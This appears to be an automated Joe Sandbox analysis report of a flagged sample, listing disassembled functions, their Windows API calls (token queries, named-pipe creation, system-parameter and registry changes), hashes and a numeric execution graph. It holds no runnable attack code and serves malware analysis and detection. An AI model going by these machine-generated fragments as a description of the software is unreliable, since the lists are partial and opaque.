                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID: api-ms-
                                                        • API String ID: 3177248105-2084034818
                                                        • Opcode ID: 4ad589ac57cd1baf47741338c88147d93c1a611783659a68a71461c8bfde2a03
                                                        • Instruction ID: 876bfff1caba7d58f9f2d0457664dfeb74b12a75e33221fddde78a829ed722c4
                                                        • Opcode Fuzzy Hash: 4ad589ac57cd1baf47741338c88147d93c1a611783659a68a71461c8bfde2a03
                                                        • Instruction Fuzzy Hash: B4E04830280305B7EF202BA5DC0EB6D3F64EB40B54F144025F90CA40E1D772DA119788
                                                        Function 00C94A9D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32(CA1DECC3,00000000,00000000,?), ref: 00C94B00
                                                          • Part of subcall function 00C90654: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C9477B,?,00000000,-00000008), ref: 00C906B5
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C94D52
                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C94D98
                                                        • GetLastError.KERNEL32 ref: 00C94E3B
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                        • String ID:
                                                        • API String ID: 2112829910-0
                                                        • Opcode ID: 5bf2617c1564edb28a1ccbfe5ea5abfddef351f6b1d0bdb16820d83a6ffbd1c9
                                                        • Instruction ID: fcdcf28c279a1ffde0380c7807f97471a8757297e5b051e978f44363d1d79548
                                                        • Opcode Fuzzy Hash: 5bf2617c1564edb28a1ccbfe5ea5abfddef351f6b1d0bdb16820d83a6ffbd1c9
                                                        • Instruction Fuzzy Hash: 30D17C75D002589FCF19CFA8D884AADFBB5FF09314F28456AE526EB351D730AA42CB50
                                                        Function 00C88A64 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AdjustPointer
                                                        • String ID:
                                                        • API String ID: 1740715915-0
                                                        • Opcode ID: 9e64acd58e1094d3a4db8520bc6b237477e1daf1c8d5b1c8935325b8f3a1a7a8
                                                        • Instruction ID: 115e29ba8f22341224303c14c2be7287a3430ae991a1ae997694790bc7272363
                                                        • Opcode Fuzzy Hash: 9e64acd58e1094d3a4db8520bc6b237477e1daf1c8d5b1c8935325b8f3a1a7a8
                                                        • Instruction Fuzzy Hash: 94510BB26013029FDB28BF14CC51BBA77A4EF80718F54412DE91257991EF31ED48D798
                                                        Function 00C824B0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 00C824CC
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C824D3
                                                        • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C824F3
                                                        • CloseHandle.KERNEL32(?), ref: 00C82502
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                        • String ID:
                                                        • API String ID: 215268677-0
                                                        • Opcode ID: 9208ebbed50056fd54bf5e979cd459130708abd18264e9f3aa24a33578427651
                                                        • Instruction ID: 1c181df58686ab2065d73802faf2d639f34670ed36844e8c19fb4d0a5f0412fd
                                                        • Opcode Fuzzy Hash: 9208ebbed50056fd54bf5e979cd459130708abd18264e9f3aa24a33578427651
                                                        • Instruction Fuzzy Hash: C301EC71A0021CABDB10EFA4DC0DBBEBBB8FF09705F404559EA21E7150DB309A14DB95
                                                        Function 00C971B6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000), ref: 00C971CD
                                                        • GetLastError.KERNEL32(?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?,?,?,00C95432,00000000), ref: 00C971D9
                                                          • Part of subcall function 00C9719F: CloseHandle.KERNEL32(FFFFFFFE,00C971E9,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?,?), ref: 00C971AF
                                                        • ___initconout.LIBCMT ref: 00C971E9
                                                          • Part of subcall function 00C97161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C97190,00C9630D,?,?,00C94E8F,?,00000000,00000000,?), ref: 00C97174
                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00C96320,00000000,00000001,?,?,?,00C94E8F,?,00000000,00000000,?), ref: 00C971FE
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                        • String ID:
                                                        • API String ID: 2744216297-0
                                                        • Opcode ID: 44e870ea42d40f63d5b2c0662265e7f086293656f33ff6948c461e411a3ba269
                                                        • Instruction ID: 4d73fd070c3d982694fb2bb88e4fc83dc5637ec09b0b840331e428c2b14c737f
                                                        • Opcode Fuzzy Hash: 44e870ea42d40f63d5b2c0662265e7f086293656f33ff6948c461e411a3ba269
                                                        • Instruction Fuzzy Hash: 81F0A236515628FFCF222F99EC0CB9D3F65FB09361F054115F92895130C6328920EB91
                                                        Function 00C89060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00C89085
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2118026453-2084237596
                                                        • Opcode ID: 48b9df5f4ca20864c6115093593e7216079cde6a42b2eb1c6e2eedc5cd02470c
                                                        • Instruction ID: b4e0a18ba803f20dc25458df51a11f1afb17bc1a1f23c4d95d13cb5c0adf3f10
                                                        • Opcode Fuzzy Hash: 48b9df5f4ca20864c6115093593e7216079cde6a42b2eb1c6e2eedc5cd02470c
                                                        • Instruction Fuzzy Hash: CF41AB3190020AAFCF16EF98CC89AEEBBB1FF48308F188199F91577215D335AA51DB55

                                                        Execution Graph

                                                        Execution Coverage:5.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:8.6%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:118
                                                        execution_graph 82783 6c804e60 82784 6c804e65 82783->82784 82785 6c804e71 Sleep 82784->82785 82786 6c804e69 WSACancelBlockingCall 82784->82786 82787 1104b884 82833 11049df0 82787->82833 82790 1104ba98 GetDC 82932 11059580 82790->82932 82791 1104b9a7 CreateEventA 82794 1104b9d2 82791->82794 82795 1104b9bb 82791->82795 82792 1104b919 82792->82790 82796 1104b925 82792->82796 82878 11102870 82794->82878 82877 11027fb0 265 API calls 2 library calls 82795->82877 82856 110ae410 82796->82856 82797 1104bac4 GetACP 82821 1104bb03 82797->82821 82803 1104b92a wsprintfA CreateFileA 82806 1104b983 SetNamedPipeHandleState 82803->82806 82807 1104b968 GetLastError 82803->82807 82805 1104b9fd 82811 11102870 std::locale::facet::_Facet_Register 265 API calls 82805->82811 82806->82790 82871 111356e0 82807->82871 82812 1104ba15 82811->82812 82813 1104ba33 82812->82813 82814 1104ba29 82812->82814 82922 11102700 82813->82922 82915 11102970 82814->82915 82818 1104bd4d 82820 1104ba8b GetPriorityClass 82820->82790 82822 1104bb65 ReleaseDC GetSystemMetrics GetSystemMetrics 82821->82822 82942 1108e4d0 6 API calls 82822->82942 82824 1104bb91 82825 1104bbd0 82824->82825 82829 1104bc66 82824->82829 82943 1108ea80 5 API calls _memset 82825->82943 82827 1104bbdb 82944 1108e460 FreeLibrary _memset std::ios_base::_Tidy 82827->82944 82828 1104b97c 82945 11150781 82828->82945 82829->82828 82832 111356e0 std::locale::facet::_Facet_Register 21 API calls 82829->82832 82831 1104bc64 82831->82829 82832->82828 82953 11048b00 82833->82953 82835 11049e01 82836 11049e67 CloseHandle 82835->82836 82837 11049e58 82835->82837 82853 11049e62 82835->82853 82840 11049e79 Sleep 82836->82840 82836->82853 82842 111356e0 std::locale::facet::_Facet_Register 21 API calls 82837->82842 82838 11049eca std::ios_base::_Tidy 82845 11049ed3 82838->82845 82969 1103a370 87 API calls 2 library calls 82838->82969 82839 11049f13 82847 11049f1e CloseHandle 82839->82847 82848 11049f2b 82839->82848 82840->82853 82841 11049eb9 82841->82845 82846 11049ec3 82841->82846 82842->82853 82844 11049ea0 SetEvent 82967 111027f0 WaitForSingleObject 82844->82967 82845->82838 82845->82839 82968 111029d0 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 82846->82968 82847->82848 82848->82790 82848->82791 82848->82792 82849 11049ee6 82852 11049f00 CloseHandle 82849->82852 82970 11103160 278 API calls 2 library calls 82849->82970 82852->82839 82853->82841 82853->82844 82853->82845 82855 11049ef7 std::ios_base::_Tidy 82855->82852 82857 110ae423 GetModuleHandleA GetProcAddress 82856->82857 82858 110ae4e4 82856->82858 82859 110ae46a GetCurrentProcessId OpenProcess 82857->82859 82860 110ae44f GetCurrentProcessId 82857->82860 82858->82803 82861 110ae4b7 82859->82861 82862 110ae487 OpenProcessToken 82859->82862 82863 110ae458 82860->82863 82867 110ae4d3 CloseHandle 82861->82867 82868 110ae4d6 82861->82868 82862->82861 82864 110ae498 82862->82864 82863->82859 82865 110ae45c 82863->82865 82864->82861 82866 110ae49f GetTokenInformation 82864->82866 82865->82803 82866->82861 82867->82868 82869 110ae4da CloseHandle 82868->82869 82870 110ae4dd 82868->82870 82869->82870 82870->82858 82872 111356f1 82871->82872 82873 111356ec 82871->82873 83507 11134c20 82872->83507 83506 111349d0 18 API calls std::locale::facet::_Facet_Register 82873->83506 82879 111515d1 _malloc 66 API calls 82878->82879 82880 1110288e 82879->82880 82881 11102897 wsprintfA 82880->82881 82884 111028c3 _memset 82880->82884 83531 11027fb0 265 API calls 2 library calls 82881->83531 82885 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82884->82885 82886 1104b9d9 82885->82886 82886->82805 82887 111035c0 82886->82887 82888 11102870 std::locale::facet::_Facet_Register 265 API calls 82887->82888 82889 111035f1 82888->82889 82890 11103613 GetCurrentThreadId InitializeCriticalSection 82889->82890 82891 11102870 std::locale::facet::_Facet_Register 265 API calls 82889->82891 82894 11103680 EnterCriticalSection 82890->82894 82895 11103673 InitializeCriticalSection 82890->82895 82893 1110360c 82891->82893 82893->82890 83532 11150c1a 66 API calls std::exception::_Copy_str 82893->83532 82896 1110373a LeaveCriticalSection 82894->82896 82897 111036ae CreateEventA 82894->82897 82895->82894 82896->82805 82899 111036c1 82897->82899 82900 111036d8 82897->82900 83534 11027fb0 265 API calls 2 library calls 82899->83534 82901 11102870 std::locale::facet::_Facet_Register 265 API calls 82900->82901 82905 111036df 82901->82905 82902 1110362f 83533 11151071 RaiseException 82902->83533 82907 111036fc 82905->82907 82908 111035c0 417 API calls 82905->82908 82909 11102870 std::locale::facet::_Facet_Register 265 API calls 82907->82909 82908->82907 82910 1110370c 82909->82910 82911 1110371d 82910->82911 82912 11102970 3 API calls 82910->82912 82913 11102700 417 API calls 82911->82913 82912->82911 82914 11103735 82913->82914 82914->82896 82916 11102986 CreateEventA 82915->82916 82917 11102999 82915->82917 82916->82917 82918 111029a7 82917->82918 83535 111026b0 InterlockedIncrement 82917->83535 82920 111029b9 82918->82920 83536 11102810 InterlockedIncrement 82918->83536 82920->82813 82923 11102720 CreateThread 82922->82923 82924 1110270f CreateEventA 82922->82924 82926 11102746 82923->82926 82927 1110275d 82923->82927 83538 111032d0 82923->83538 83552 11025fa0 82923->83552 83576 1102adc0 82923->83576 83611 110f6330 82923->83611 82924->82923 83537 11027fb0 265 API calls 2 library calls 82926->83537 82929 11102761 WaitForSingleObject CloseHandle 82927->82929 82930 1104ba54 CloseHandle GetWindowThreadProcessId OpenProcess 82927->82930 82929->82930 82930->82820 82930->82828 82933 110595af 82932->82933 82934 110595d5 82933->82934 82935 110595b5 82933->82935 82937 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82934->82937 82936 111520cb __wcstoi64 79 API calls 82935->82936 82938 110595c2 82936->82938 82939 110595e2 82937->82939 82940 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82938->82940 82939->82797 82941 110595cf 82940->82941 82941->82797 82942->82824 82943->82827 82944->82831 82946 11150789 82945->82946 82947 1115078b IsDebuggerPresent 82945->82947 82946->82818 83888 11165e37 82947->83888 82950 1115a679 SetUnhandledExceptionFilter UnhandledExceptionFilter 82951 1115a696 __call_reportfault 82950->82951 82952 1115a69e GetCurrentProcess TerminateProcess 82950->82952 82951->82952 82952->82818 82954 11048b16 82953->82954 82955 11048bef 82953->82955 82956 11048bce 82954->82956 82957 11048b25 82954->82957 82955->82835 82956->82955 82971 110480c0 82956->82971 82959 11048ba4 82957->82959 82960 11048b93 82957->82960 82962 110480c0 837 API calls 82959->82962 83118 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82960->83118 82964 11048bbc 82962->82964 82963 11048b9b 82963->82835 83119 11037ba0 121 API calls 2 library calls 82964->83119 82966 11048bc8 82966->82835 82967->82853 82968->82838 82969->82849 82970->82855 82972 11048145 IsWindow 82971->82972 82973 1104835f 82971->82973 82972->82973 82984 11048154 82972->82984 82974 110483a1 82973->82974 82977 11048367 82973->82977 82978 110483a3 82973->82978 82975 110485fc 82974->82975 82976 110483e9 82974->82976 82979 11048604 82975->82979 82980 1104890f 82975->82980 82981 11048405 82976->82981 82999 110485bd 82976->82999 82977->82974 82977->82975 83182 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82977->83182 82978->82974 82978->82975 83184 110397c0 92 API calls 82978->83184 82982 1104864e 82979->82982 82987 11059580 79 API calls 82979->82987 82994 11048954 82980->82994 83001 11059580 79 API calls 82980->83001 82983 11048409 82981->82983 83009 1104843d 82981->83009 83025 11048676 82982->83025 83120 1103f3e0 82982->83120 82989 11048431 82983->82989 82990 11048412 82983->82990 82984->82973 83153 110a7ce0 265 API calls 82984->83153 82995 11048633 82987->82995 82988 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 82996 11048abe 82988->82996 83188 11045ae0 309 API calls 82989->83188 83186 11045ae0 309 API calls 82990->83186 82993 110483cb 83185 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 82993->83185 83210 1103ae60 636 API calls 2 library calls 82994->83210 82995->82982 83011 11059580 79 API calls 82995->83011 82996->82955 82998 11048393 83183 110397c0 92 API calls 82998->83183 83005 11048438 82999->83005 83197 110ab090 EnterCriticalSection LeaveCriticalSection SetEvent LeaveCriticalSection LeaveCriticalSection 82999->83197 83008 11048946 83001->83008 83003 11048419 83187 1103ae60 636 API calls 2 library calls 83003->83187 83005->82988 83008->82994 83209 11045ae0 309 API calls 83008->83209 83017 11048527 83009->83017 83189 11045ae0 309 API calls 83009->83189 83010 1104895e 83013 11048967 83010->83013 83014 11048971 83010->83014 83011->82982 83211 11116ea0 15 API calls 83013->83211 83142 11121170 IsWindow PostMessageA 83014->83142 83015 1104842c 83015->83005 83016 110486df 83018 110486ce 83016->83018 83199 11045ae0 309 API calls 83016->83199 83191 1103ae60 636 API calls 2 library calls 83017->83191 83035 11048714 83018->83035 83036 1104872b 83018->83036 83023 11048187 83049 11048205 83023->83049 83050 1104821c 83023->83050 83024 110486c0 83198 11045ae0 309 API calls 83024->83198 83025->83016 83025->83024 83031 11059580 79 API calls 83025->83031 83028 1104896e 83028->83014 83029 11048540 83029->83005 83037 1104856f 83029->83037 83041 1104855f Sleep 83029->83041 83030 11048977 83038 1104898c 83030->83038 83086 110489eb 83030->83086 83143 110397c0 92 API calls 83030->83143 83034 110486bc 83031->83034 83033 11048496 83033->83017 83070 110484be 83033->83070 83034->83016 83034->83024 83200 11027fb0 265 API calls 2 library calls 83035->83200 83201 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83036->83201 83192 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83037->83192 83038->83030 83041->83029 83041->83037 83046 11048734 83202 1103e560 301 API calls 83046->83202 83047 11048578 83053 11048584 83047->83053 83054 1104859e 83047->83054 83048 110489b7 83144 11101f00 278 API calls std::locale::facet::_Facet_Register 83048->83144 83154 11027fb0 265 API calls 2 library calls 83049->83154 83155 111515d1 83050->83155 83051 11048a0f 83059 11048a19 PostMessageA 83051->83059 83193 110ece70 92 API calls 3 library calls 83053->83193 83195 110397c0 92 API calls 83054->83195 83071 11048a3d 83059->83071 83060 1104873c 83065 1104877c 83060->83065 83066 1104874d 83060->83066 83062 110489cd 83212 111202d0 SetTimer KillTimer GetDlgItem EnableWindow 83062->83212 83073 110487c6 83065->83073 83085 11059580 79 API calls 83065->83085 83203 111202d0 SetTimer KillTimer GetDlgItem EnableWindow 83066->83203 83067 11048590 83194 11037ba0 121 API calls 2 library calls 83067->83194 83069 110485ac 83196 11037ba0 121 API calls 2 library calls 83069->83196 83070->83005 83190 110342d0 8 API calls 83070->83190 83071->83005 83079 11048a46 PostMessageA PostMessageA PostMessageA PostMessageA PostMessageA 83071->83079 83206 1103ae60 636 API calls 2 library calls 83073->83206 83075 110489d3 83075->83086 83145 11127610 83075->83145 83078 11048249 83172 11027fb0 265 API calls 2 library calls 83078->83172 83079->83005 83080 11048754 83204 11101f00 278 API calls std::locale::facet::_Facet_Register 83080->83204 83090 110487a3 83085->83090 83213 11039860 302 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 83086->83213 83087 11048260 83091 1104825d 83087->83091 83101 1104829b _memmove 83087->83101 83088 110484fd 83092 111356e0 std::locale::facet::_Facet_Register 21 API calls 83088->83092 83089 1104876b 83205 110397c0 92 API calls 83089->83205 83090->83073 83097 11059580 79 API calls 83090->83097 83091->83087 83173 11027fb0 265 API calls 2 library calls 83091->83173 83092->83005 83094 110488b4 83208 11121170 IsWindow PostMessageA 83094->83208 83096 11048779 83096->83065 83099 110487be 83097->83099 83099->83073 83099->83094 83100 110488bb 83102 110488f1 GetTickCount 83100->83102 83107 11059580 79 API calls 83100->83107 83103 110482f1 SendMessageTimeoutA 83101->83103 83104 11048298 83101->83104 83102->83059 83175 11151665 83103->83175 83104->83101 83174 11027fb0 265 API calls 2 library calls 83104->83174 83110 110488e6 83107->83110 83109 1104834a 83181 110a8410 267 API calls std::locale::facet::_Facet_Register 83109->83181 83110->83102 83111 110488ea MessageBeep 83110->83111 83111->83102 83112 110487d2 83112->83094 83207 110342d0 8 API calls 83112->83207 83115 1104888a 83116 111356e0 std::locale::facet::_Facet_Register 21 API calls 83115->83116 83117 1104889b 83116->83117 83117->83094 83118->82963 83119->82966 83121 1103f412 83120->83121 83122 1103f418 83121->83122 83129 1103f434 83121->83129 83123 110ef160 15 API calls 83122->83123 83125 1103f42a CloseHandle 83123->83125 83124 1103f548 83126 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83124->83126 83125->83129 83128 1103f555 83126->83128 83127 1103f4c8 83214 110ef160 GetTokenInformation 83127->83214 83128->83025 83129->83124 83132 1103f46d 83129->83132 83224 110827b0 297 API calls 5 library calls 83129->83224 83132->83124 83132->83127 83133 1103f4da 83134 1103f4e2 CloseHandle 83133->83134 83137 1103f4e9 83133->83137 83134->83137 83135 1103f52b 83138 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83135->83138 83136 1103f511 83139 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83136->83139 83137->83135 83137->83136 83140 1103f544 83138->83140 83141 1103f527 83139->83141 83140->83025 83141->83025 83142->83030 83143->83048 83144->83062 83146 1112767d 83145->83146 83147 1112761c 83145->83147 83146->83086 83148 11059580 79 API calls 83147->83148 83150 11127635 83148->83150 83149 1112765d 83149->83146 83238 11120190 144 API calls std::locale::facet::_Facet_Register 83149->83238 83150->83146 83150->83149 83226 111204d0 83150->83226 83153->83023 83156 1115164e 83155->83156 83169 111515df 83155->83169 83499 1115be88 DecodePointer 83156->83499 83158 11151654 83500 11157ccf 66 API calls __getptd_noexit 83158->83500 83161 1115160d RtlAllocateHeap 83161->83169 83171 11048228 83161->83171 83163 1115163a 83497 11157ccf 66 API calls __getptd_noexit 83163->83497 83167 11151638 83498 11157ccf 66 API calls __getptd_noexit 83167->83498 83168 111515ea 83168->83169 83493 1115c37d 66 API calls __NMSG_WRITE 83168->83493 83494 1115c1ce 66 API calls 6 library calls 83168->83494 83495 1115bf0d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83168->83495 83169->83161 83169->83163 83169->83167 83169->83168 83496 1115be88 DecodePointer 83169->83496 83171->83078 83171->83087 83176 11151670 HeapFree 83175->83176 83177 11151699 __dosmaperr 83175->83177 83176->83177 83178 11151685 83176->83178 83177->83109 83501 11157ccf 66 API calls __getptd_noexit 83178->83501 83180 1115168b GetLastError 83180->83177 83181->82973 83182->82998 83183->82974 83184->82993 83185->82974 83186->83003 83187->83015 83502 11117ef0 315 API calls 2 library calls 83187->83502 83188->83005 83189->83033 83190->83088 83191->83029 83503 11117ef0 315 API calls 2 library calls 83191->83503 83192->83047 83193->83067 83194->83015 83195->83069 83196->83015 83197->83005 83198->83018 83199->83018 83201->83046 83202->83060 83203->83080 83204->83089 83205->83096 83206->83112 83504 11117ef0 315 API calls 2 library calls 83206->83504 83207->83115 83208->83100 83209->82994 83210->83010 83505 11117ef0 315 API calls 2 library calls 83210->83505 83211->83028 83212->83075 83213->83051 83215 110ef1a8 83214->83215 83216 110ef197 83214->83216 83225 110e6e20 9 API calls 83215->83225 83217 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83216->83217 83219 110ef1a4 83217->83219 83219->83133 83220 110ef1cc 83220->83216 83221 110ef1d4 83220->83221 83222 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83221->83222 83223 110ef1fa 83222->83223 83223->83133 83224->83132 83225->83220 83227 111204dd 83226->83227 83233 11120569 83226->83233 83228 11120518 83227->83228 83239 11108cb0 83227->83239 83230 11120532 83228->83230 83303 1110e3d0 83228->83303 83230->83233 83235 11059580 79 API calls 83230->83235 83231 11120509 83285 11108f70 83231->83285 83233->83149 83236 11120554 83235->83236 83236->83233 83418 11109440 83236->83418 83238->83146 83240 11108cd4 83239->83240 83241 11108f4a 83239->83241 83242 11108cdc 83240->83242 83243 11108e6d SystemParametersInfoA 83240->83243 83244 11134650 std::locale::facet::_Facet_Register 90 API calls 83241->83244 83245 11108dd0 83242->83245 83428 11134650 83242->83428 83247 11108e98 83243->83247 83246 11108f58 83244->83246 83248 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83245->83248 83249 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83246->83249 83252 11108f23 SystemParametersInfoA 83247->83252 83253 11108eac 83247->83253 83250 11108ddf 83248->83250 83251 11108f66 83249->83251 83250->83231 83251->83231 83254 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83252->83254 83256 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83253->83256 83257 11108f44 83254->83257 83261 11108ed4 83256->83261 83257->83231 83259 11108f04 RegCloseKey 83264 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83259->83264 83260 11108de5 SystemParametersInfoA 83262 11108e5e SystemParametersInfoA 83260->83262 83263 11108dfe 83260->83263 83261->83259 83435 11152c8a 79 API calls __isdigit_l 83261->83435 83262->83245 83267 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83263->83267 83268 11108f1d 83264->83268 83265 11108d17 83265->83245 83431 11132450 RegQueryValueExA 83265->83431 83271 11108e2a 83267->83271 83268->83231 83270 11108eee 83270->83259 83273 11108ef5 SystemParametersInfoA 83270->83273 83274 11108dc9 RegCloseKey 83271->83274 83434 11152c8a 79 API calls __isdigit_l 83271->83434 83273->83259 83274->83245 83275 11108d68 83278 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83275->83278 83276 11108d56 SystemParametersInfoA 83276->83275 83279 11108d94 83278->83279 83279->83274 83433 11152c8a 79 API calls __isdigit_l 83279->83433 83280 11108e44 83280->83274 83281 11108e4f SystemParametersInfoA 83280->83281 83281->83274 83283 11108dae 83283->83274 83284 11108db5 SystemParametersInfoA 83283->83284 83284->83274 83286 11134650 std::locale::facet::_Facet_Register 90 API calls 83285->83286 83287 11108f8e 83286->83287 83288 11108fb5 83287->83288 83290 11108f98 83287->83290 83291 11134460 std::locale::facet::_Facet_Register 90 API calls 83287->83291 83289 11108fc4 CoInitialize CoCreateInstance 83288->83289 83288->83290 83292 11108ff4 